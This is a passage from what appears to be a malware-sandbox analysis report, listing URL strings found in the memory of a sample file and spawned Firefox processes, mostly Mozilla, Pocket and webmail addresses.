00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eat.hungryroot.com/hungryroot-reset?utm_medium=paid
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://electricliterature.com/8-novels-about-the-dangerous-pursuit-of-youth-and-beauty/?utm_source=
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3126198363.0000016DE68B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3125801220.0000016DEA264000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3122392806.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124555602.0000016DE68D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124692516.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000021.00000003.3169134521.0000016DEA950000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.dns.nextdns.io/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com/1
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f22
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B0152F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/collections/the-jobs-you-didnt-know-existed?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/25-years-later-this-cozy-n64-classic-finally-gets-the-recognition
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/a-magnetic-therapy-for-depression-gains-precision?utm_source=pock
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/an-old-virginia-plantation-a-new-owner-and-a-family-legacy-unveil
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/crunchwrap-supreme?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/do-you-have-a-shadow-side-the-psychology-of-why-we-find-some-peop
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/essential-bike-maintenance-tips-everyone-should-know?utm_source=p
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/here-s-a-list-of-everything-haruki-murakami-has-ever-compared-to-
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/how-to-compost-an-easy-diy-guide?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/how-to-sleep-better-the-4-best-strategies-according-to-the-expert
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/mechanical-movements-of-the-cold-war-how-the-soviets-revolutioniz
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/restaurant-work-can-destroy-your-body-but-it-doesn-t-have-to?utm_
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-beginner-s-guide-to-catching-your-first-fish?utm_source=pocke
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-bizarre-cultural-history-of-saliva?utm_source=pocket-newtab-e
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-first-reviews-of-every-virginia-woolf-novel?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-ideal-vacation-length-for-peak-relaxation-according-to-expert
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-lazarus-heist-how-north-korea-almost-pulled-off-a-billion-dol
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-million-dollar-scammer-and-his-many-mormon-marks?utm_source=p
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-mysterious-case-of-the-f-117-nighthawk-s-flip-down-radar-loca
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/the-scientific-underpinnings-and-impacts-of-shame?utm_source=pock
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/why-is-my-hair-changing-texture-and-when-should-i-see-a-professio
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/item/why-there-s-still-no-new-birth-control-for-men?utm_source=pocket-
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE662C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hips.hearstapps.com/hmg-prod/images/garmin-race-adaptive-training-rwd060124-669aaf40f0f0d.jp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.kinja-img.com/image/upload/c_fill
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.natgeofe.com/n/aa2728ac-4a75-4b3e-9163-2b32a66e9d1d/MM100710_230501_00795_16x9.JPG?w=1200
Source: firefox.exe, 00000021.00000003.3167497219.0000016DEA924000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3171125970.0000016DE4874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ichef.bbci.co.uk/images/ic/480xn/p0jdbybk.jpg.webp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210723597.0000016DEA8E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://images.fastcompany.com/image/upload/f_auto
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2F149349728.v2.pressablecdn.com%2Fwp-co
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fd1n0c1ufntxbvh.cloudfront.net%2Fphoto
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fhips.hearstapps.com%2Fhmg-prod%2Fimag
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fi.natgeofe.com%2Fn%2Faa2728ac-4a75-4b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fichef.bbci.co.uk%2Fimages%2Fic%2F480x
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F3c46a6db9
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba2700
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2Ff85f50edc
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-c
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fwww.motherjones.com%2Fwp-content%2Fup
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img.pastemagazine.com/wp-content/juploads/2024/07/olympicbeds.jpg
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imgix.bustle.com/uploads/image/2024/7/24/d57cdb8b/quitcooking_social.jpg?w=1200&h=630&fit=cr
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkr4C8afQLY4CHW1plrfCDYftIWHG7kJnEYgFIvxnEnJrNWxnwmH
Source: firefox.exe, 00000021.00000003.3202170893.0000016DECCFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/a41b546f-2a45-4575-b7b2-1924b
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000021.00000003.3203254934.0000016DEA83E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200643077.0000016DEE217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000021.00000003.2896043336.0000016DDE44E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://market-trk.com/50/9411?campaign=FF-SOV03-CompareCredit-BoATravel
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://media.wired.com/photos/669ee1db82dcc6be43bb872a/191:100/w_1280
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://money.com/olympic-gold-medals-worth-value/?utm_source=pocket-newtab-en-us
